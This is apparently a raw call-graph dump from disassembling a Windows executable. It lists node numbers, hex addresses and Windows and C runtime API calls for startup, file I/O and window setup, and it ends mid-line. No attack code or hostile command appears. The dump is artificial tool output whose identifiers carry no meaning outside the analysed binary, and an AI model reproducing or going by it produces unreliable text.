GetSystemInfo 107802->107804 107805 c32b64 GetSystemInfo 107803->107805 107806 c32b28 GetProcAddress 107803->107806 107807 c32b3e 107805->107807 107806->107805 107810 c32b38 GetNativeSystemInfo 107806->107810 107811 c32b42 FreeLibrary 107807->107811 107812 c3109d 107807->107812 107808->107800 107809 c73869 107808->107809 107810->107807 107811->107812 107813 c504c3 29 API calls __onexit 107812->107813 107813->107792 107814 c5f11e 107815 c5f12a ___BuildCatchObject 107814->107815 107816 c5f136 107815->107816 107817 c5f14b 107815->107817 107833 c62c38 20 API calls _abort 107816->107833 107827 c595ad EnterCriticalSection 107817->107827 107820 c5f13b 107834 c62b7c 26 API calls _abort 107820->107834 107821 c5f157 107828 c5f18b 107821->107828 107826 c5f146 __fread_nolock 107827->107821 107836 c5f1b6 107828->107836 107830 c5f198 107832 c5f164 107830->107832 107856 c62c38 20 API calls _abort 107830->107856 107835 c5f181 LeaveCriticalSection __fread_nolock 107832->107835 107833->107820 107834->107826 107835->107826 107837 c5f1c4 107836->107837 107838 c5f1de 107836->107838 107867 c62c38 20 API calls _abort 107837->107867 107857 c5dd75 107838->107857 107841 c5f1c9 107868 c62b7c 26 API calls _abort 107841->107868 107842 c5f1e7 107864 c69829 107842->107864 107846 c5f26f 107850 c5f28c 107846->107850 107852 c5f29e 107846->107852 107847 c5f2eb 107848 c5f2f8 107847->107848 107847->107852 107870 c62c38 20 API calls _abort 107848->107870 107869 c5f4cf 31 API calls 4 library calls 107850->107869 107854 c5f1d4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 107852->107854 107871 c5f34b 30 API calls 2 library calls 107852->107871 107853 c5f296 107853->107854 107854->107830 107856->107832 107858 c5dd96 107857->107858 107859 c5dd81 107857->107859 107858->107842 107872 c62c38 20 API calls _abort 107859->107872 107861 c5dd86 107873 c62b7c 26 API calls _abort 107861->107873 107863 c5dd91 107863->107842 107874 c696a6 107864->107874 107866 c5f203 107866->107846 107866->107847 107866->107854 107867->107841 107868->107854 107869->107853 107870->107854 107871->107854 107872->107861 107873->107863 107875 c696b2 ___BuildCatchObject 107874->107875 107876 c696d2 107875->107876 107877 c696ba 107875->107877 107879 c69786 107876->107879 107884 c6970a 107876->107884 107909 c62c25 20 API calls _abort 107877->107909 107914 c62c25 20 API calls _abort 107879->107914 107880 c696bf 107910 c62c38 20 API calls _abort 107880->107910 107883 c6978b 107915 c62c38 20 API calls _abort 107883->107915 107899 c65567 EnterCriticalSection 107884->107899 107887 c69793 107916 c62b7c 26 API calls _abort 107887->107916 107888 c69710 107890 c69734 107888->107890 107891 c69749 107888->107891 107911 c62c38 20 API calls _abort 107890->107911 107900 c697ab 107891->107900 107894 c696c7 __fread_nolock 107894->107866 107895 c69744 107913 c6977e LeaveCriticalSection __wsopen_s 107895->107913 107896 c69739 107912 c62c25 20 API calls _abort 107896->107912 107899->107888 107901 c657e4 __wsopen_s 26 API calls 107900->107901 107902 c697bd 107901->107902 107903 c697d6 SetFilePointerEx 107902->107903 107904 c697c5 107902->107904 107906 c697ee GetLastError 107903->107906 107908 c697ca 107903->107908 107917 c62c38 20 API calls _abort 107904->107917 107918 c62c02 20 API calls __dosmaperr 107906->107918 107908->107895 107909->107880 107910->107894 107911->107896 107912->107895 107913->107894 107914->107883 107915->107887 107916->107894 107917->107908 107918->107908 107919 c5081b 107920 c50827 ___BuildCatchObject 107919->107920 107949 c502d1 107920->107949 107922 c5082e 107923 c50981 107922->107923 107927 c50858 107922->107927 107990 c50c5f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 107923->107990 107925 c50988 107983 c55272 107925->107983 107936 c50897 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 107927->107936 107960 c6280d 107927->107960 107933 c50877 107935 c508f8 107968 c50d79 107935->107968 107936->107935 107986 c5523a 38 API calls 2 library calls 107936->107986 107938 c508fe 107972 c328e0 107938->107972 107943 c5091a 107943->107925 107944 c5091e 107943->107944 107945 c50927 107944->107945 107988 c55215 28 API calls _abort 107944->107988 107989 c50460 13 API calls 2 library calls 107945->107989 107948 c5092f 107948->107933 107950 c502da 107949->107950 107992 c50ab8 IsProcessorFeaturePresent 107950->107992 107952 c502e6 107993 c530b4 10 API calls 3 library calls 107952->107993 107954 c502eb 107955 c502ef 107954->107955 107994 c626a7 107954->107994 107955->107922 107958 c50306 107958->107922 107962 c62824 107960->107962 107961 c50eac _ValidateLocalCookies 5 API calls 107963 c50871 107961->107963 107962->107961 107963->107933 107964 c627b1 107963->107964 107965 c627e0 107964->107965 107966 c50eac _ValidateLocalCookies 5 API calls 107965->107966 107967 c62809 107966->107967 107967->107936 108010 c52760 107968->108010 107971 c50d9f 107971->107938 107973 c32947 107972->107973 107974 c328ec IsThemeActive 107972->107974 107987 c50db2 GetModuleHandleW 107973->107987 108012 c55363 107974->108012 107976 c32917 108018 c553c9 107976->108018 107978 c3291e 108025 c328ab SystemParametersInfoW SystemParametersInfoW 107978->108025 107980 c32925 108026 c3331e 107980->108026 107982 c3292d SystemParametersInfoW 107982->107973 108940 c54fef 107983->108940 107986->107935 107987->107943 107988->107945 107989->107948 107990->107925 107992->107952 107993->107954 107998 c6d616 107994->107998 107997 c530dd 8 API calls 3 library calls 107997->107955 107999 c6d62f 107998->107999 108002 c50eac 107999->108002 108001 c502f8 108001->107958 108001->107997 108003 c50eb5 108002->108003 108004 c50eb7 IsProcessorFeaturePresent 108002->108004 108003->108001 108006 c5107d 108004->108006 108009 c51041 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 108006->108009 108008 c51160 108008->108001 108009->108008 108011 c50d8c GetStartupInfoW 108010->108011 108011->107971 108013 c5536f ___BuildCatchObject 108012->108013 108075 c6337e EnterCriticalSection 108013->108075 108015 c5537a pre_c_initialization 108076 c553ba 108015->108076 108017 c553af __fread_nolock 108017->107976 108019 c553d5 108018->108019 108020 c553ef 108018->108020 108019->108020 108080 c62c38 20 API calls _abort 108019->108080 108020->107978 108022 c553df 108081 c62b7c 26 API calls _abort 108022->108081 108024 c553ea 108024->107978 108025->107980 108027 c3332e __wsopen_s 108026->108027 108028 c39091 22 API calls 108027->108028 108029 c3333a GetCurrentDirectoryW 108028->108029 108082 c3496b 108029->108082 108031 c33361 IsDebuggerPresent 108032 c73e16 MessageBoxA 108031->108032 108033 c3336f 108031->108033 108035 c73e2e 108032->108035 108034 c33383 108033->108034 108033->108035 108142 c32950 108034->108142 108180 c37998 22 API calls 108035->108180 108039 c333a2 GetFullPathNameW 108040 c3b0db 22 API calls 108039->108040 108041 c333e1 108040->108041 108158 c345a6 108041->108158 108042 c333f5 108044 c73e5f SetCurrentDirectoryW 108042->108044 108045 c333fd 108042->108045 108044->108045 108046 c33408 108045->108046 108181 c91edd AllocateAndInitializeSid CheckTokenMembership FreeSid 108045->108181 108174 c33466 7 API calls 108046->108174 108049 c73e7a 108049->108046 108052 c73e8c 108049->108052 108054 c34ff8 24 API calls 108052->108054 108053 c33412 108059 c33427 108053->108059 108178 c33df8 61 API calls ___scrt_fastfail 108053->108178 108055 c73e95 108054->108055 108057 c3c110 22 API calls 108055->108057 108060 c73ea3 108057->108060 108058 c33442 108064 c33449 SetCurrentDirectoryW 108058->108064 108059->108058 108179 c33b82 Shell_NotifyIconW ___scrt_fastfail 108059->108179 108062 c73ed2 108060->108062 108063 c73eab 108060->108063 108065 c34dcb 22 API calls 108062->108065 108066 c34dcb 22 API calls 108063->108066 108068 c3345d 108064->108068 108069 c73ece GetForegroundWindow ShellExecuteW 108065->108069 108067 c73eb6 108066->108067 108182 c34d30 108067->108182 108068->107982 108073 c73f03 108069->108073 108073->108058 108074 c34dcb 22 API calls 108074->108069 108075->108015 108079 c633c6 LeaveCriticalSection 108076->108079 108078 c553c1 108078->108017 108079->108078 108080->108022 108081->108024 108083 c39091 22 API calls 108082->108083 108084 c34981 108083->108084 108189 c37772 108084->108189 108086 c3499f 108087 c38e3b 22 API calls 108086->108087 108088 c349b3 108087->108088 108203 c3b4d2 108088->108203 108091 c3c110 22 API calls 108092 c349d7 108091->108092 108093 c38fbd 40 API calls 108092->108093 108094 c349e7 108093->108094 108095 c3c110 22 API calls 108094->108095 108096 c34a0d 108095->108096 108097 c38fbd 40 API calls 108096->108097 108098 c34a1c 108097->108098 108099 c39091 22 API calls 108098->108099 108100 c34a3a 108099->108100 108206 c34b5c 108100->108206 108102 c34a46 108210 c54e48 108102->108210 108104 c34a54 108105 c745ee 108104->108105 108106 c34a5e 108104->108106 108107 c34b5c 22 API calls 108105->108107 108108 c54e48 _strftime 40 API calls 108106->108108 108109 c74602 108107->108109 108110 c34a69 108108->108110 108112 c34b5c 22 API calls 108109->108112 108110->108109 108111 c34a73 108110->108111 108113 c54e48 _strftime 40 API calls 108111->108113 108114 c7461e 108112->108114 108115 c34a7e 108113->108115 108117 c34ff8 24 API calls 108114->108117 108115->108114 108116 c34a88 108115->108116 108118 c54e48 _strftime 40 API calls 108116->108118 108120 c74641 108117->108120 108119 c34a93 108118->108119 108121 c7466a 108119->108121 108128 c34a9d 108119->108128 108122 c34b5c 22 API calls 108120->108122 108124 c34b5c 22 API calls 108121->108124 108125 c7464d 108122->108125 108123 c34ac0 108127 c746a5 108123->108127 108129 c348fb 22 API calls 108123->108129 108126 c74688 108124->108126 108132 c34b5c 22 API calls 108125->108132 108133 c34b5c 22 API calls 108126->108133 108128->108123 108130 c34b5c 22 API calls 108128->108130 108131 c34ad0 108129->108131 108130->108123 108134 c347f0 22 API calls 108131->108134 108132->108121 108133->108127 108135 c34ade 108134->108135 108220 c41ef0 108135->108220 108137 c3b4d2 22 API calls 108139 c34af9 108137->108139 108138 c41ef0 22 API calls 108138->108139 108139->108137 108139->108138 108140 c34b3d 108139->108140 108141 c34b5c 22 API calls 108139->108141 108140->108031 108141->108139 108143 c3295d __wsopen_s 108142->108143 108144 c32976 108143->108144 108145 c7368e ___scrt_fastfail 108143->108145 108146 c350f7 23 API calls 108144->108146 108147 c736aa GetOpenFileNameW 108145->108147 108148 c3297f 108146->108148 108149 c736f9 108147->108149 108234 c332e0 108148->108234 108151 c3b0db 22 API calls 108149->108151 108153 c7370e 108151->108153 108153->108153 108155 c32994 108252 c32b70 108155->108252 108159 c345b3 __wsopen_s 108158->108159 108923 c3bd1a 108159->108923 108161 c345b8 108162 c34632 108161->108162 108930 c33ee4 82 API calls 108161->108930 108162->108042 108164 c345c5 108164->108162 108931 c357bf 84 API calls 108164->108931 108166 c345ce 108166->108162 108167 c345d2 GetFullPathNameW 108166->108167 108168 c3b0db 22 API calls 108167->108168 108169 c345fe 108168->108169 108170 c3b0db 22 API calls 108169->108170 108171 c3460b 108170->108171 108172 c745af 108171->108172 108173 c3b0db 22 API calls 108171->108173 108173->108162 108933 c335b7 7 API calls 108174->108933 108176 c3340d 108177 c33546 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 108176->108177 108177->108053 108178->108059 108179->108058 108180->108042 108181->108049 108183 c34d42 108182->108183 108184 c7476f 108182->108184 108934 c34d53 108183->108934 108939 c912f6 22 API calls __fread_nolock 108184->108939 108187 c34d4e 108187->108074 108188 c74779 108190 c3777f __wsopen_s 108189->108190 108191 c3b0db 22 API calls 108190->108191 108192 c377b1 108190->108192 108191->108192 108202 c377e7 108192->108202 108227 c378f9 108192->108227 108194 c3c110 22 API calls 108195 c378de 108194->108195 108198 c35e8e 22 API calls 108195->108198 108196 c3c110 22 API calls 108196->108202 108197 c378f9 22 API calls 108197->108202 108199 c378ea 108198->108199 108199->108086 108200 c35e8e 22 API calls 108200->108202 108201 c378b5 108201->108194 108201->108199 108202->108196 108202->108197 108202->108200 108202->108201 108204 c501fb 22 API calls 108203->108204 108205 c349ca 108204->108205 108205->108091 108207 c34b84 108206->108207 108209 c34b66 108206->108209 108208 c3b0db 22 API calls 108207->108208 108208->108209 108209->108102 108211 c54e56 108210->108211 108212 c54ecb 108210->108212 108219 c54e7b 108211->108219 108230 c62c38 20 API calls _abort 108211->108230 108232 c54edd 40 API calls 4 library calls 108212->108232 108215 c54ed8 108215->108104 108216 c54e62 108231 c62b7c 26 API calls _abort 108216->108231 108218 c54e6d 108218->108104 108219->108104 108221 c41f06 108220->108221 108222 c87676 108221->108222 108224 c41f10 108221->108224 108233 c4bd4f 22 API calls 108222->108233 108225 c501fb 22 API calls 108224->108225 108226 c4202b 108224->108226 108225->108226 108226->108139 108228 c38f59 22 API calls 108227->108228 108229 c37904 108228->108229 108229->108192 108230->108216 108231->108218 108232->108215 108233->108226 108235 c72370 __wsopen_s 108234->108235 108236 c332ed GetLongPathNameW 108235->108236 108237 c3b0db 22 API calls 108236->108237 108238 c32988 108237->108238 108239 c34f9d 108238->108239 108240 c39091 22 API calls 108239->108240 108241 c34faf 108240->108241 108242 c350f7 23 API calls 108241->108242 108243 c34fba 108242->108243 108244 c74a36 CompareStringW 108243->108244 108245 c34fc5 108243->108245 108246 c74a63 108244->108246 108247 c74a58 108244->108247 108248 c35e8e 22 API calls 108245->108248 108247->108244 108247->108246 108249 c34fd1 108248->108249 108278 c31585 108249->108278 108251 c34fe4 108251->108155 108282 c32be0 108252->108282 108255 c738bd 108401 ca358a 80 API calls ___std_exception_copy 108255->108401 108256 c32be0 94 API calls 108258 c32ba9 108256->108258 108258->108255 108260 c32bb1 108258->108260 108259 c738ce 108261 c738d2 108259->108261 108277 c738ef 108259->108277 108262 c738da 108260->108262 108263 c32bbd 108260->108263 108402 c32c4e 108261->108402 108408 c9e1d0 82 API calls 108262->108408 108304 c37e80 108263->108304 108267 c738e8 108267->108277 108268 c3299e 108268->108039 108268->108042 108269 c32c4e 68 API calls 108273 c73ae5 108269->108273 108270 c38c8d 22 API calls 108270->108277 108273->108269 108415 c9a072 82 API calls __wsopen_s 108273->108415 108274 c3c110 22 API calls 108274->108277 108277->108270 108277->108273 108277->108274 108409 c99d84 40 API calls _wcslen 108277->108409 108410 ca13b6 22 API calls 108277->108410 108411 c3beb6 108277->108411 108279 c31597 __fread_nolock 108278->108279 108280 c501fb 22 API calls 108279->108280 108281 c315cd 108280->108281 108281->108251 108416 c3320e LoadLibraryA 108282->108416 108287 c73b46 108290 c32c4e 68 API calls 108287->108290 108288 c32c0b LoadLibraryExW 108424 c331d7 LoadLibraryA 108288->108424 108292 c73b4d 108290->108292 108294 c331d7 3 API calls 108292->108294 108297 c73b55 108294->108297 108295 c32c35 108296 c32c41 108295->108296 108295->108297 108299 c32c4e 68 API calls 108296->108299 108444 c32daa 108297->108444 108301 c32b95 108299->108301 108301->108255 108301->108256 108303 c73b7c 108305 c37ea9 108304->108305 108306 c760c8 108304->108306 108308 c362ad CloseHandle 108305->108308 108781 c9a072 82 API calls __wsopen_s 108306->108781 108309 c37edb 108308->108309 108310 c39091 22 API calls 108309->108310 108311 c37ee4 108310->108311 108315 c362ad CloseHandle 108311->108315 108312 c37f41 108316 c39091 22 API calls 108312->108316 108313 c37f33 108313->108312 108314 c760db 108313->108314 108314->108313 108782 c9d455 SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 108314->108782 108318 c37eed 108315->108318 108317 c37f4d 108316->108317 108665 c4fca9 108317->108665 108321 c362ad CloseHandle 108318->108321 108324 c37ef6 108321->108324 108322 c7613e 108322->108312 108644 c33195 108324->108644 108325 c39091 22 API calls 108327 c37f65 108325->108327 108329 c350f7 23 API calls 108327->108329 108332 c37f73 108329->108332 108330 c37f18 108652 c32e2b 108330->108652 108331 c764fa 108792 c9a072 82 API calls __wsopen_s 108331->108792 108670 c4fb60 108332->108670 108335 c7650f 108335->108335 108339 c37f2a 108778 c32e14 SetFilePointerEx SetFilePointerEx SetFilePointerEx 108339->108778 108342 c37fb6 108344 c39091 22 API calls 108342->108344 108343 c76154 108345 c362ad CloseHandle 108343->108345 108346 c37fbf 108344->108346 108347 c7615d 108345->108347 108348 c39091 22 API calls 108346->108348 108349 c32be0 94 API calls 108347->108349 108350 c37fc8 108348->108350 108352 c76185 108349->108352 108679 c36052 108350->108679 108354 c76491 108352->108354 108783 ca358a 80 API calls ___std_exception_copy 108352->108783 108353 c37fdf 108355 c34d30 22 API calls 108353->108355 108790 c9a072 82 API calls __wsopen_s 108354->108790 108358 c37ff0 SetCurrentDirectoryW 108355->108358 108364 c38003 108358->108364 108359 c761a4 108360 c32c4e 68 API calls 108359->108360 108361 c761b2 108360->108361 108361->108354 108362 c761ba 108361->108362 108363 c501fb 22 API calls 108362->108363 108365 c761e2 108363->108365 108367 c33172 22 API calls 108364->108367 108369 c38c8d 22 API calls 108365->108369 108366 c362ad CloseHandle 108368 c38196 108366->108368 108395 c38021 ISource _wcslen 108367->108395 108372 c362ad CloseHandle 108368->108372 108397 c76223 108369->108397 108370 c763fe 108787 ca1328 22 API calls 108370->108787 108371 c38141 108375 c362ad CloseHandle 108371->108375 108373 c381a8 108372->108373 108373->108268 108376 c3814a SetCurrentDirectoryW 108375->108376 108388 c38164 ISource 108376->108388 108379 c76424 108788 c94991 22 API calls __fread_nolock 108379->108788 108381 c38c8d 22 API calls 108381->108397 108383 c764dd 108791 c9a072 82 API calls __wsopen_s 108383->108791 108386 c764f1 108386->108371 108388->108366 108390 c3c110 22 API calls 108390->108395 108391 c3c110 22 API calls 108391->108397 108395->108371 108395->108383 108395->108390 108711 c381e9 108395->108711 108718 c37bb5 108395->108718 108722 c37c02 108395->108722 108726 c37ca2 108395->108726 108730 c37cdd 108395->108730 108779 c567e5 GetStringTypeW _strftime 108395->108779 108780 c37998 22 API calls 108395->108780 108396 c76466 108789 c9a072 82 API calls __wsopen_s 108396->108789 108397->108370 108397->108381 108397->108391 108397->108396 108784 c99d84 40 API calls _wcslen 108397->108784 108785 ca13b6 22 API calls 108397->108785 108786 c37998 22 API calls 108397->108786 108400 c7647f 108400->108388 108401->108259 108403 c32c58 108402->108403 108405 c32c5f 108402->108405 108843 c5ea98 108403->108843 108406 c73ba2 FreeLibrary 108405->108406 108407 c32c76 108405->108407 108407->108262 108408->108267 108409->108277 108410->108277 108412 c3bec9 108411->108412 108413 c3bf6d 108411->108413 108412->108413 108414 c501fb 22 API calls 108412->108414 108413->108277 108414->108412 108415->108273 108417 c33226 GetProcAddress 108416->108417 108418 c32bf2 108416->108418 108419 c33236 108417->108419 108421 c5ea0b 108418->108421 108419->108418 108420 c3323d FreeLibrary 108419->108420 108420->108418 108450 c5e94a 108421->108450 108423 c32bff 108423->108287 108423->108288 108425 c32c23 108424->108425 108426 c331ec GetProcAddress 108424->108426 108429 c32c80 108425->108429 108427 c331fc 108426->108427 108427->108425 108428 c33204 FreeLibrary 108427->108428 108428->108425 108430 c32c95 108429->108430 108431 c33172 22 API calls 108430->108431 108433 c32ca1 __fread_nolock 108431->108433 108432 c73bc0 108510 ca3964 74 API calls 108432->108510 108433->108432 108437 c32cdc 108433->108437 108509 ca38e0 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 108433->108509 108436 c32daa 40 API calls 108436->108437 108437->108436 108440 c32d70 ISource 108437->108440 108441 c73c04 108437->108441 108504 c32dd4 108437->108504 108439 c32dd4 64 API calls 108442 c73c33 108439->108442 108440->108295 108441->108439 108443 c32daa 40 API calls 108442->108443 108443->108440 108445 c32dbc 108444->108445 108448 c73c5e 108444->108448 108542 c5ece4 108445->108542 108449 ca318f 27 API calls 108449->108303 108453 c5e956 ___BuildCatchObject 108450->108453 108451 c5e964 108475 c62c38 20 API calls _abort 108451->108475 108453->108451 108454 c5e994 108453->108454 108456 c5e9a6 108454->108456 108457 c5e999 108454->108457 108455 c5e969 108476 c62b7c 26 API calls _abort 108455->108476 108467 c68481 108456->108467 108477 c62c38 20 API calls _abort 108457->108477 108461 c5e9af 108462 c5e9b5 108461->108462 108463 c5e9c2 108461->108463 108478 c62c38 20 API calls _abort 108462->108478 108479 c5e9f4 LeaveCriticalSection __fread_nolock 108463->108479 108464 c5e974 __fread_nolock 108464->108423 108468 c6848d ___BuildCatchObject 108467->108468 108480 c6337e EnterCriticalSection 108468->108480 108470 c6849b 108481 c6851b 108470->108481 108474 c684cc __fread_nolock 108474->108461 108475->108455 108476->108464 108477->108464 108478->108464 108479->108464 108480->108470 108482 c6853e 108481->108482 108483 c68597 108482->108483 108490 c684a8 108482->108490 108498 c595ad EnterCriticalSection 108482->108498 108499 c595c1 LeaveCriticalSection 108482->108499 108500 c6509d 20 API calls 2 library calls 108483->108500 108485 c685a0 108487 c62de8 _free 20 API calls 108485->108487 108488 c685a9 108487->108488 108488->108490 108501 c63825 11 API calls 2 library calls 108488->108501 108495 c684d7 108490->108495 108491 c685c8 108502 c595ad EnterCriticalSection 108491->108502 108494 c685db 108494->108490 108503 c633c6 LeaveCriticalSection 108495->108503 108497 c684de 108497->108474 108498->108482 108499->108482 108500->108485 108501->108491 108502->108494 108503->108497 108505 c32de3 108504->108505 108506 c73c7e 108504->108506 108511 c5f103 108505->108511 108509->108432 108510->108437 108514 c5eeca 108511->108514 108513 c32df1 108513->108437 108517 c5eed6 ___BuildCatchObject 108514->108517 108515 c5eee2 108539 c62c38 20 API calls _abort 108515->108539 108517->108515 108518 c5ef08 108517->108518 108527 c595ad EnterCriticalSection 108518->108527 108519 c5eee7 108540 c62b7c 26 API calls _abort 108519->108540 108522 c5ef14 108528 c5f02a 108522->108528 108524 c5ef28 108541 c5ef47 LeaveCriticalSection __fread_nolock 108524->108541 108526 c5eef2 __fread_nolock 108526->108513 108527->108522 108529 c5f04c 108528->108529 108530 c5f03c 108528->108530 108532 c5ef51 28 API calls 108529->108532 108531 c62c38 __dosmaperr 20 API calls 108530->108531 108533 c5f041 108531->108533 108534 c5f06f 108532->108534 108533->108524 108535 c5e02b 62 API calls 108534->108535 108538 c5f0ee 108534->108538 108536 c5f096 108535->108536 108537 c69844 __wsopen_s 28 API calls 108536->108537 108537->108538 108538->108524 108539->108519 108540->108526 108541->108526 108545 c5ed01 108542->108545 108544 c32dcd 108544->108449 108546 c5ed0d ___BuildCatchObject 108545->108546 108547 c5ed20 ___scrt_fastfail 108546->108547 108548 c5ed4d 108546->108548 108549 c5ed45 __fread_nolock 108546->108549 108572 c62c38 20 API calls _abort 108547->108572 108558 c595ad EnterCriticalSection 108548->108558 108549->108544 108551 c5ed57 108559 c5eb18 108551->108559 108554 c5ed3a 108573 c62b7c 26 API calls _abort 108554->108573 108558->108551 108562 c5eb2a ___scrt_fastfail 108559->108562 108565 c5eb47 108559->108565 108560 c5eb37 108640 c62c38 20 API calls _abort 108560->108640 108562->108560 108562->108565 108567 c5eb8a __fread_nolock 108562->108567 108563 c5eb3c 108641 c62b7c 26 API calls _abort 108563->108641 108574 c5ed8c LeaveCriticalSection __fread_nolock 108565->108574 108566 c5eca6 ___scrt_fastfail 108643 c62c38 20 API calls _abort 108566->108643 108567->108565 108567->108566 108569 c5dd75 __fread_nolock 26 API calls 108567->108569 108575 c69165 108567->108575 108642 c5d398 26 API calls 4 library calls 108567->108642 108569->108567 108572->108554 108573->108549 108574->108549 108576 c69177 108575->108576 108577 c6918f 108575->108577 108578 c62c25 __dosmaperr 20 API calls 108576->108578 108579 c694f9 108577->108579 108587 c691d4 108577->108587 108580 c6917c 108578->108580 108581 c62c25 __dosmaperr 20 API calls 108579->108581 108582 c62c38 __dosmaperr 20 API calls 108580->108582 108583 c694fe 108581->108583 108588 c69184 108582->108588 108584 c62c38 __dosmaperr 20 API calls 108583->108584 108589 c691ec 108584->108589 108585 c691df 108586 c62c25 __dosmaperr 20 API calls 108585->108586 108590 c691e4 108586->108590 108587->108585 108587->108588 108592 c6920f 108587->108592 108588->108567 108593 c62b7c _abort 26 API calls 108589->108593 108591 c62c38 __dosmaperr 20 API calls 108590->108591 108591->108589 108594 c69228 108592->108594 108595 c6924e 108592->108595 108596 c6926a 108592->108596 108593->108588 108594->108595 108600 c69235 108594->108600 108597 c62c25 __dosmaperr 20 API calls 108595->108597 108598 c63c40 _strftime 21 API calls 108596->108598 108599 c69253 108597->108599 108601 c69281 108598->108601 108603 c62c38 __dosmaperr 20 API calls 108599->108603 108602 c6fcbc __fread_nolock 26 API calls 108600->108602 108604 c62de8 _free 20 API calls 108601->108604 108605 c693d3 108602->108605 108606 c6925a 108603->108606 108607 c6928a 108604->108607 108608 c69449 108605->108608 108610 c693ec GetConsoleMode 108605->108610 108609 c62b7c _abort 26 API calls 108606->108609 108611 c62de8 _free 20 API calls 108607->108611 108612 c6944d ReadFile 108608->108612 108637 c69265 __fread_nolock 108609->108637 108610->108608 108613 c693fd 108610->108613 108614 c69291 108611->108614 108615 c69467 108612->108615 108616 c694c1 GetLastError 108612->108616 108613->108612 108617 c69403 ReadConsoleW 108613->108617 108618 c692b6 108614->108618 108619 c6929b 108614->108619 108615->108616 108622 c6943e 108615->108622 108620 c69425 108616->108620 108621 c694ce 108616->108621 108617->108622 108624 c6941f GetLastError 108617->108624 108623 c69844 __wsopen_s 28 API calls 108618->108623 108626 c62c38 __dosmaperr 20 API calls 108619->108626 108629 c62c02 __dosmaperr 20 API calls 108620->108629 108620->108637 108627 c62c38 __dosmaperr 20 API calls 108621->108627 108632 c694a3 108622->108632 108633 c6948c 108622->108633 108622->108637 108623->108600 108624->108620 108625 c62de8 _free 20 API calls 108625->108588 108630 c692a0 108626->108630 108628 c694d3 108627->108628 108631 c62c25 __dosmaperr 20 API calls 108628->108631 108629->108637 108634 c62c25 __dosmaperr 20 API calls 108630->108634 108631->108637 108636 c694ba 108632->108636 108632->108637 108635 c68e81 __fread_nolock 31 API calls 108633->108635 108634->108637 108635->108637 108638 c68cc1 __fread_nolock 29 API calls 108636->108638 108637->108625 108639 c694bf 108638->108639 108639->108637 108640->108563 108641->108565 108642->108567 108643->108563 108645 c73da5 108644->108645 108646 c331ac CreateFileW 108644->108646 108647 c331cb 108645->108647 108648 c73dab CreateFileW 108645->108648 108646->108647 108647->108330 108647->108331 108648->108647 108649 c73dd3 108648->108649 108650 c32f13 3 API calls 108649->108650 108651 c73dde 108650->108651 108651->108647 108653 c32e40 108652->108653 108664 c32e3d ISource 108652->108664 108654 c32f13 3 API calls 108653->108654 108653->108664 108655 c32e5d 108654->108655 108656 c32e6a 108655->108656 108657 c73cbb 108655->108657 108659 c33172 22 API calls 108656->108659 108799 c3286d SetFilePointerEx SetFilePointerEx SetFilePointerEx 108657->108799 108660 c32e80 108659->108660 108793 c384c0 108660->108793 108663 c32f13 3 API calls 108663->108664 108664->108339 108666 c72370 __wsopen_s 108665->108666 108667 c4fcb6 GetCurrentDirectoryW 108666->108667 108668 c3b0db 22 API calls 108667->108668 108669 c37f59 108668->108669 108669->108325 108671 c384c0 2 API calls 108670->108671 108672 c37f99 108671->108672 108673 c32f13 108672->108673 108678 c32f2a 108673->108678 108674 c32fb1 SetFilePointerEx SetFilePointerEx 108676 c32f7d 108674->108676 108675 c73d0c SetFilePointerEx 108676->108342 108676->108343 108677 c73cfb 108677->108675 108678->108674 108678->108675 108678->108676 108678->108677 108680 c39091 22 API calls 108679->108680 108681 c36068 108680->108681 108682 c39091 22 API calls 108681->108682 108683 c36070 108682->108683 108684 c39091 22 API calls 108683->108684 108685 c36078 108684->108685 108686 c39091 22 API calls 108685->108686 108687 c36080 108686->108687 108688 c74c70 108687->108688 108689 c360b4 108687->108689 108692 c38e3b 22 API calls 108688->108692 108690 c3b26f 22 API calls 108689->108690 108691 c360c2 108690->108691 108693 c399c5 22 API calls 108691->108693 108696 c360f7 108692->108696 108694 c360cc 108693->108694 108695 c3b26f 22 API calls 108694->108695 108694->108696 108698 c360ed 108695->108698 108699 c36118 108696->108699 108705 c3613c 108696->108705 108707 c74c9b 108696->108707 108697 c3b26f 22 API calls 108709 c3614d 108697->108709 108700 c399c5 22 API calls 108698->108700 108701 c378f9 22 API calls 108699->108701 108699->108705 108700->108696 108702 c36125 108701->108702 108704 c3b26f 22 API calls 108702->108704 108702->108705 108703 c3b0db 22 API calls 108708 c74d5b 108703->108708 108704->108705 108705->108697 108706 c378f9 22 API calls 108706->108708 108707->108703 108708->108705 108708->108706 108801 c3afe0 22 API calls __fread_nolock 108708->108801 108709->108353 108712 c38e3b 22 API calls 108711->108712 108713 c38204 108712->108713 108802 c38287 108713->108802 108715 c3820c 108716 c399c5 22 API calls 108715->108716 108717 c3821e 108715->108717 108716->108717 108717->108395 108719 c37bc2 108718->108719 108721 c37be4 108719->108721 108839 c567e5 GetStringTypeW _strftime 108719->108839 108721->108395 108723 c37c14 108722->108723 108724 c37c1a 108722->108724 108723->108724 108725 c5922b 40 API calls 108723->108725 108724->108395 108725->108724 108727 c37caf _wcslen 108726->108727 108729 c37cc9 108727->108729 108840 c37976 GetStringTypeW 108727->108840 108729->108395 108731 c37cf2 108730->108731 108732 c501fb 22 API calls 108731->108732 108733 c37cfd 108732->108733 108734 c5922b 40 API calls 108733->108734 108736 c37d0f ISource 108733->108736 108735 c37d43 108734->108735 108735->108736 108737 c5922b 40 API calls 108735->108737 108736->108395 108738 c37d57 108737->108738 108738->108736 108739 c5922b 40 API calls 108738->108739 108740 c37d6f 108739->108740 108740->108736 108741 c5922b 40 API calls 108740->108741 108742 c37d87 108741->108742 108743 c75f47 108742->108743 108744 c37d92 108742->108744 108749 c37bb5 GetStringTypeW 108743->108749 108745 c5922b 40 API calls 108744->108745 108746 c37d9f 108745->108746 108747 c75fe1 108746->108747 108748 c37daa 108746->108748 108747->108736 108752 c75fec CompareStringW 108747->108752 108755 c7601f 108747->108755 108750 c5922b 40 API calls 108748->108750 108751 c75f58 108749->108751 108753 c37db7 108750->108753 108754 c37ca2 GetStringTypeW 108751->108754 108752->108747 108752->108755 108753->108755 108756 c37dc2 108753->108756 108762 c75f60 _wcslen 108754->108762 108755->108736 108841 